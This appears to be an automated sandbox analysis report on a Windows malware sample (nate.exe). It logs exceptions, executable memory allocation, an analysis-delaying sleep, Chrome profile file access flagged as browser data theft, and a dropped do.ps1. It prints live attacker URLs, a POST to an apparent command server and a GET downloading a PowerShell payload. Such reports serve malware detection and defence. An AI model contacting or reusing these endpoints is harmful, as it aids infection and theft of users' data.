__exception__ Sept. 22, 2024, 3:09 p.m.	stacktrace: exception.instruction_r: fb 68 41 fb 66 2a 89 1c 24 bb e2 0f f7 36 50 b8 exception.symbol: nate+0x2439f2 exception.instruction: sti exception.module: nate.exe exception.exception_code: 0xc0000096 exception.offset: 2374130 exception.address: 0x11d39f2 registers.esp: 4194040 registers.edi: 0 registers.eax: 4294942500 registers.ebp: 4006785044 registers.edx: 18720143 registers.ebx: 1458033363 registers.esi: 605849942 registers.ecx: 0	1
__exception__ Sept. 22, 2024, 3:09 p.m.	stacktrace: exception.instruction_r: fb 57 e9 67 00 00 00 50 b8 61 81 75 7e 05 06 52 exception.symbol: nate+0x244af0 exception.instruction: sti exception.module: nate.exe exception.exception_code: 0xc0000096 exception.offset: 2378480 exception.address: 0x11d4af0 registers.esp: 4194036 registers.edi: 0 registers.eax: 30200 registers.ebp: 4006785044 registers.edx: 18720143 registers.ebx: 1458033363 registers.esi: 605849942 registers.ecx: 18695530	1
__exception__ Sept. 22, 2024, 3:09 p.m.	stacktrace: exception.instruction_r: fb 31 ff ff 34 39 e9 95 08 00 00 ff 34 24 59 83 exception.symbol: nate+0x244733 exception.instruction: sti exception.module: nate.exe exception.exception_code: 0xc0000096 exception.offset: 2377523 exception.address: 0x11d4733 registers.esp: 4194040 registers.edi: 0 registers.eax: 30200 registers.ebp: 4006785044 registers.edx: 18720143 registers.ebx: 1458033363 registers.esi: 605849942 registers.ecx: 18725730	1
__exception__ Sept. 22, 2024, 3:09 p.m.	stacktrace: exception.instruction_r: fb e9 0a f7 ff ff ff 74 24 04 58 8f 04 24 8b 24 exception.symbol: nate+0x245061 exception.instruction: sti exception.module: nate.exe exception.exception_code: 0xc0000096 exception.offset: 2379873 exception.address: 0x11d5061 registers.esp: 4194040 registers.edi: 4294940072 registers.eax: 30200 registers.ebp: 4006785044 registers.edx: 286636384 registers.ebx: 1458033363 registers.esi: 605849942 registers.ecx: 18725730	1
__exception__ Sept. 22, 2024, 3:09 p.m.	stacktrace: exception.instruction_r: fb 83 ec 04 89 1c 24 bb d7 b3 f3 79 29 de 5b 81 exception.symbol: nate+0x24ac8c exception.instruction: sti exception.module: nate.exe exception.exception_code: 0xc0000096 exception.offset: 2403468 exception.address: 0x11dac8c registers.esp: 4194036 registers.edi: 4294940072 registers.eax: 33292 registers.ebp: 4006785044 registers.edx: 0 registers.ebx: 65804 registers.esi: 18720579 registers.ecx: 1969225870	1
__exception__ Sept. 22, 2024, 3:09 p.m.	stacktrace: exception.instruction_r: fb 81 ec 04 00 00 00 89 2c 24 e9 34 01 00 00 01 exception.symbol: nate+0x24ad01 exception.instruction: sti exception.module: nate.exe exception.exception_code: 0xc0000096 exception.offset: 2403585 exception.address: 0x11dad01 registers.esp: 4194040 registers.edi: 4294937404 registers.eax: 33292 registers.ebp: 4006785044 registers.edx: 0 registers.ebx: 65804 registers.esi: 18753871 registers.ecx: 714907021	1
__exception__ Sept. 22, 2024, 3:09 p.m.	stacktrace: exception.instruction_r: fb 31 c9 e9 26 09 00 00 8b 1c 24 83 c4 04 e9 b7 exception.symbol: nate+0x24b6f3 exception.instruction: sti exception.module: nate.exe exception.exception_code: 0xc0000096 exception.offset: 2406131 exception.address: 0x11db6f3 registers.esp: 4194040 registers.edi: 4294937404 registers.eax: 28103 registers.ebp: 4006785044 registers.edx: 0 registers.ebx: 16767664 registers.esi: 18752420 registers.ecx: 1813281207	1
__exception__ Sept. 22, 2024, 3:09 p.m.	stacktrace: exception.instruction_r: fb e9 cc fe ff ff 81 6c 24 04 70 63 ea 7f 01 44 exception.symbol: nate+0x24b9c6 exception.instruction: sti exception.module: nate.exe exception.exception_code: 0xc0000096 exception.offset: 2406854 exception.address: 0x11db9c6 registers.esp: 4194040 registers.edi: 4294937404 registers.eax: 28103 registers.ebp: 4006785044 registers.edx: 91113 registers.ebx: 16767664 registers.esi: 18752420 registers.ecx: 4294941940	1
__exception__ Sept. 22, 2024, 3:09 p.m.	stacktrace: exception.instruction_r: fb 81 ec 04 00 00 00 e9 ec fe ff ff 81 c7 e3 f1 exception.symbol: nate+0x24e2e2 exception.instruction: sti exception.module: nate.exe exception.exception_code: 0xc0000096 exception.offset: 2417378 exception.address: 0x11de2e2 registers.esp: 4194040 registers.edi: 18737384 registers.eax: 4274938216 registers.ebp: 4006785044 registers.edx: 0 registers.ebx: 16767664 registers.esi: 18752420 registers.ecx: 4294941940	1
__exception__ Sept. 22, 2024, 3:09 p.m.	stacktrace: exception.instruction_r: fb e9 07 01 00 00 5e 29 c7 57 89 14 24 ba 04 06 exception.symbol: nate+0x2505ba exception.instruction: sti exception.module: nate.exe exception.exception_code: 0xc0000096 exception.offset: 2426298 exception.address: 0x11e05ba registers.esp: 4194036 registers.edi: 18743414 registers.eax: 29823 registers.ebp: 4006785044 registers.edx: 0 registers.ebx: 120859 registers.esi: 37489804 registers.ecx: 18741531	1
__exception__ Sept. 22, 2024, 3:09 p.m.	stacktrace: exception.instruction_r: fb 53 89 3c 24 bf f5 4c 6f 39 e9 cf 01 00 00 89 exception.symbol: nate+0x2507d0 exception.instruction: sti exception.module: nate.exe exception.exception_code: 0xc0000096 exception.offset: 2426832 exception.address: 0x11e07d0 registers.esp: 4194040 registers.edi: 18746369 registers.eax: 0 registers.ebp: 4006785044 registers.edx: 0 registers.ebx: 120859 registers.esi: 157417 registers.ecx: 18741531	1
__exception__ Sept. 22, 2024, 3:09 p.m.	stacktrace: exception.instruction_r: fb 57 c7 04 24 45 07 f7 7f f7 14 24 81 2c 24 d3 exception.symbol: nate+0x263cb4 exception.instruction: sti exception.module: nate.exe exception.exception_code: 0xc0000096 exception.offset: 2505908 exception.address: 0x11f3cb4 registers.esp: 4194040 registers.edi: 18825473 registers.eax: 210325591 registers.ebp: 4006785044 registers.edx: 0 registers.ebx: 18805978 registers.esi: 5881836 registers.ecx: 32166	1
__exception__ Sept. 22, 2024, 3:09 p.m.	stacktrace: exception.instruction_r: fb 52 ba 41 28 df 7d e9 55 05 00 00 b9 ca 69 d1 exception.symbol: nate+0x26cc16 exception.instruction: sti exception.module: nate.exe exception.exception_code: 0xc0000096 exception.offset: 2542614 exception.address: 0x11fcc16 registers.esp: 4194036 registers.edi: 18826889 registers.eax: 32281 registers.ebp: 4006785044 registers.edx: 2130566132 registers.ebx: 1969225702 registers.esi: 18859933 registers.ecx: 0	1
__exception__ Sept. 22, 2024, 3:09 p.m.	stacktrace: exception.instruction_r: fb 29 ff ff 34 3e ff 34 24 ff 34 24 5a e9 00 00 exception.symbol: nate+0x26cd6f exception.instruction: sti exception.module: nate.exe exception.exception_code: 0xc0000096 exception.offset: 2542959 exception.address: 0x11fcd6f registers.esp: 4194040 registers.edi: 18826889 registers.eax: 32281 registers.ebp: 4006785044 registers.edx: 2130566132 registers.ebx: 1969225702 registers.esi: 18892214 registers.ecx: 0	1
__exception__ Sept. 22, 2024, 3:09 p.m.	stacktrace: exception.instruction_r: fb 55 89 0c 24 56 e9 57 fc ff ff 29 ce 8b 0c 24 exception.symbol: nate+0x26ccf7 exception.instruction: sti exception.module: nate.exe exception.exception_code: 0xc0000096 exception.offset: 2542839 exception.address: 0x11fccf7 registers.esp: 4194040 registers.edi: 4294937736 registers.eax: 32281 registers.ebp: 4006785044 registers.edx: 604292950 registers.ebx: 1969225702 registers.esi: 18892214 registers.ecx: 0	1
__exception__ Sept. 22, 2024, 3:09 p.m.	stacktrace: exception.instruction_r: fb 81 ec 04 00 00 00 89 34 24 53 c7 04 24 72 68 exception.symbol: nate+0x272c49 exception.instruction: sti exception.module: nate.exe exception.exception_code: 0xc0000096 exception.offset: 2567241 exception.address: 0x1202c49 registers.esp: 4194040 registers.edi: 18913547 registers.eax: 29953 registers.ebp: 4006785044 registers.edx: 4294940428 registers.ebx: 2071340110 registers.esi: 18892214 registers.ecx: 2179172691	1
__exception__ Sept. 22, 2024, 3:09 p.m.	stacktrace: exception.instruction_r: fb 57 68 d7 ab 6f 7f ff 34 24 5f 83 c4 04 68 50 exception.symbol: nate+0x27b964 exception.instruction: sti exception.module: nate.exe exception.exception_code: 0xc0000096 exception.offset: 2603364 exception.address: 0x120b964 registers.esp: 4194036 registers.edi: 4025624863 registers.eax: 30530 registers.ebp: 4006785044 registers.edx: 2130566132 registers.ebx: 18920677 registers.esi: 3804555158 registers.ecx: 2149484926	1
__exception__ Sept. 22, 2024, 3:09 p.m.	stacktrace: exception.instruction_r: fb 51 e9 56 fd ff ff 58 81 6c 24 04 7f a3 ef 76 exception.symbol: nate+0x27b8e2 exception.instruction: sti exception.module: nate.exe exception.exception_code: 0xc0000096 exception.offset: 2603234 exception.address: 0x120b8e2 registers.esp: 4194040 registers.edi: 4025624863 registers.eax: 30530 registers.ebp: 4006785044 registers.edx: 2130566132 registers.ebx: 18951207 registers.esi: 3804555158 registers.ecx: 2149484926	1
__exception__ Sept. 22, 2024, 3:09 p.m.	stacktrace: exception.instruction_r: fb 52 ba dc 05 fe 57 f7 da e9 33 07 00 00 81 f2 exception.symbol: nate+0x27b696 exception.instruction: sti exception.module: nate.exe exception.exception_code: 0xc0000096 exception.offset: 2602646 exception.address: 0x120b696 registers.esp: 4194040 registers.edi: 604277074 registers.eax: 30530 registers.ebp: 4006785044 registers.edx: 0 registers.ebx: 18923215 registers.esi: 3804555158 registers.ecx: 2149484926	1
__exception__ Sept. 22, 2024, 3:09 p.m.	stacktrace: exception.instruction_r: fb 51 56 68 7c df af 5e 8b 34 24 81 c4 04 00 00 exception.symbol: nate+0x281cb4 exception.instruction: sti exception.module: nate.exe exception.exception_code: 0xc0000096 exception.offset: 2628788 exception.address: 0x1211cb4 registers.esp: 4194036 registers.edi: 18593486 registers.eax: 29977 registers.ebp: 4006785044 registers.edx: 18578816 registers.ebx: 18945721 registers.esi: 5881836 registers.ecx: 18592887	1

HTTP traffic contains suspicious features which may be indicative of malware related traffic (2 events)

suspicious_features	POST method with no referer header, POST method with no useragent header, Connection to IP address				suspicious_request	POST http://31.41.244.10/Dem7kTu/index.php
suspicious_features	GET method with no useragent header, Connection to IP address				suspicious_request	GET http://185.215.113.103/test/do.ps1

Performs some HTTP requests (2 events)

request	POST http://31.41.244.10/Dem7kTu/index.php
request	GET http://185.215.113.103/test/do.ps1

Sends data using the HTTP POST Method (1 event)

request

POST http://31.41.244.10/Dem7kTu/index.php

Allocates read-write-execute memory (usually to unpack itself) (50 out of 194 events)

Time & API	Arguments	Status
NtProtectVirtualMemory Sept. 22, 2024, 3:09 p.m.	process_identifier: 884 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7793f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 22, 2024, 3:09 p.m.	process_identifier: 884 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x778b0000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 22, 2024, 3:09 p.m.	process_identifier: 884 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 188416 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00f91000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 22, 2024, 3:09 p.m.	process_identifier: 884 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x008e0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 22, 2024, 3:09 p.m.	process_identifier: 884 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00930000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 22, 2024, 3:09 p.m.	process_identifier: 884 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00940000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 22, 2024, 3:09 p.m.	process_identifier: 884 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a50000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 22, 2024, 3:09 p.m.	process_identifier: 884 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00aa0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 22, 2024, 3:09 p.m.	process_identifier: 884 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00ab0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 22, 2024, 3:09 p.m.	process_identifier: 884 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00d00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 22, 2024, 3:09 p.m.	process_identifier: 884 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00d50000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 22, 2024, 3:09 p.m.	process_identifier: 884 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00ea0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 22, 2024, 3:09 p.m.	process_identifier: 884 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00eb0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 22, 2024, 3:09 p.m.	process_identifier: 884 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00ec0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 22, 2024, 3:09 p.m.	process_identifier: 884 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00ed0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 22, 2024, 3:09 p.m.	process_identifier: 884 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00f20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 22, 2024, 3:09 p.m.	process_identifier: 884 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00f70000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 22, 2024, 3:09 p.m.	process_identifier: 884 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00f80000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 22, 2024, 3:09 p.m.	process_identifier: 884 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02860000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 22, 2024, 3:09 p.m.	process_identifier: 884 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02870000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 22, 2024, 3:09 p.m.	process_identifier: 884 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02880000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 22, 2024, 3:09 p.m.	process_identifier: 884 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02890000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 22, 2024, 3:09 p.m.	process_identifier: 884 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028a0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 22, 2024, 3:09 p.m.	process_identifier: 884 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028f0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 22, 2024, 3:09 p.m.	process_identifier: 884 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00aa0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 22, 2024, 3:09 p.m.	process_identifier: 884 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02900000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 22, 2024, 3:09 p.m.	process_identifier: 884 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00aa0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 22, 2024, 3:09 p.m.	process_identifier: 884 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00aa0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 22, 2024, 3:09 p.m.	process_identifier: 884 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00aa0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 22, 2024, 3:09 p.m.	process_identifier: 884 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00aa0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 22, 2024, 3:09 p.m.	process_identifier: 884 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02f80000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 22, 2024, 3:02 p.m.	process_identifier: 1236 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000048d0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 22, 2024, 3:09 p.m.	process_identifier: 2216 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7793f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 22, 2024, 3:09 p.m.	process_identifier: 2216 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x778b0000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 22, 2024, 3:09 p.m.	process_identifier: 2216 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 188416 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00951000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 22, 2024, 3:09 p.m.	process_identifier: 2216 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00900000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 22, 2024, 3:09 p.m.	process_identifier: 2216 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02220000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 22, 2024, 3:09 p.m.	process_identifier: 2216 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02230000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 22, 2024, 3:09 p.m.	process_identifier: 2216 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02280000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 22, 2024, 3:09 p.m.	process_identifier: 2216 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x022d0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 22, 2024, 3:09 p.m.	process_identifier: 2216 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x022e0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 22, 2024, 3:09 p.m.	process_identifier: 2216 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x022f0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 22, 2024, 3:09 p.m.	process_identifier: 2216 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02300000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 22, 2024, 3:09 p.m.	process_identifier: 2216 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02410000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 22, 2024, 3:09 p.m.	process_identifier: 2216 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02460000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 22, 2024, 3:09 p.m.	process_identifier: 2216 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02470000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 22, 2024, 3:09 p.m.	process_identifier: 2216 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02480000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 22, 2024, 3:09 p.m.	process_identifier: 2216 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02490000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 22, 2024, 3:09 p.m.	process_identifier: 2216 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024a0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 22, 2024, 3:09 p.m.	process_identifier: 2216 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024f0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

A process attempted to delay the analysis task. (1 event)

description

svoutse.exe tried to sleep 1133 seconds, actually delayed analysis time by 1133 seconds

An application raised an exception which may be indicative of an exploit crash (2 events)

Time & API	Arguments	Status	Return	Repeated
Application Crash	Process chrome.exe with pid 2540 crashed
__exception__ Sept. 22, 2024, 3:02 p.m.	stacktrace: 0x180004 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 0x30 exception.instruction_r: ff 15 16 1f 09 00 ff 25 00 00 00 00 aa a4 fc 76 exception.instruction: call qword ptr [rip + 0x91f16] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x180004 registers.r14: 260108248 registers.r15: 84220080 registers.rcx: 1380 registers.rsi: 17302540 registers.r10: 0 registers.rbx: 260107504 registers.rsp: 260107224 registers.r11: 260111120 registers.r8: 2004779404 registers.r9: 0 registers.rdx: 1404 registers.r12: 260107864 registers.rbp: 260107360 registers.rdi: 84395248 registers.rax: 1572864 registers.r13: 84534800	1	0	0

Steals private information from local Internet browsers (22 events)

file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\reports\79fc6174-2640-41f8-a5e9-bc13f2ed3924.dmp
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\BrowserMetrics-66EFF17E-9EC.pma
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CrashpadMetrics-spare.pma
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Last Version
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CrashpadMetrics.pma
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CrashpadMetrics-active.pma
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics-spare.pma
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\First Run
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\reports
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\index
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\metadata
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_0
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_1
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_2
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_3

Creates executable files on the filesystem (1 event)

file	C:\Users\test22\AppData\Local\Temp\1000055041\do.ps1

Creates a shortcut to an executable file (1 event)

